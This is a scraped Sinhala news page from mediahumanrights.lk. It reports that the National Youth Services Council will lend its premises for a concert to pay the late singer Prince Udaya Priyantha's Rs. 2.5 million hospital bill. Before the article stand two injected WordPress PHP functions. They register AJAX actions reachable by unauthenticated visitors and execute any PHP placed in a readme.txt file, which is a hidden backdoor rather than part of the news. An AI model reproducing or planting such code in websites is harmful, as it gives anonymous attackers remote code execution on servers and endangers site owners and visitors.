if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } සමුගත් ප්‍රින්ස්‌ගේ රෝහල් බිල මාසයක් තුළ ගෙවිය යුතුයි - කරන්න යන දේ මෙන්න - mediahumanrights.lk
mediahumanrights.lk
Local News News

සමුගත් ප්‍රින්ස්‌ගේ රෝහල් බිල මාසයක් තුළ ගෙවිය යුතුයි – කරන්න යන දේ මෙන්න

ජීවිතයෙන් සමුගත් ගායක ප්‍රින්ස්‌ උදය ප්‍රියන්තගේ පෞද්ගලික රෝහල් ගාස්‌තුව වන රුපියල් ලක්‌ෂ 25 ක මුදල සොයා ගැනීමට සංගීත ප්‍රසංගයක්‌ පැවැත්වීම සඳහා ජාතික තරුණ සේවා සභාව නොමිලේ සිය පරිශ්‍රය සහ  සම්පත් ලබා දීමට තීරණය කර තිබෙනවා.
තරුණ සේවා සභාපති එරන්ද වැලිඅංගේ මේ බව  ගායක ගායිකා සංගමයේ සභාපති කීර්ති පැස්‌කුවෙල් වෙත දැනුම්දී ඇති බවයි වාර්තා වන්නේ.
කොළඹ පෞද්ගලික රෝහලෙන් ප්‍රින්ස්‌ගේ දේහය නිදහස්‌ කර ගැනීම සඳහා රුපියල් ලක්‌ෂ 25 ක බිල්පතක්‌ රෝහලට ගෙවීමට තිබූ අතර  එය මසක්‌ ඇතුළත ගෙවන  පොරොන්දුව මත දේහය නිදහස්‌ කර ගනු ලැබුවා.
(under the courtesy of nethfm news web)

Related posts

මෙරට කොරෝනා 18,000 පනී..

Shiran Viraj

වැඩි කල ඉන්ධන මිලට විරෝධතා….

Shiran Viraj

දෙමල සන්ධානය සජිත්ට සහාය.. නායකයා වෙන මතයක..

Shiran Viraj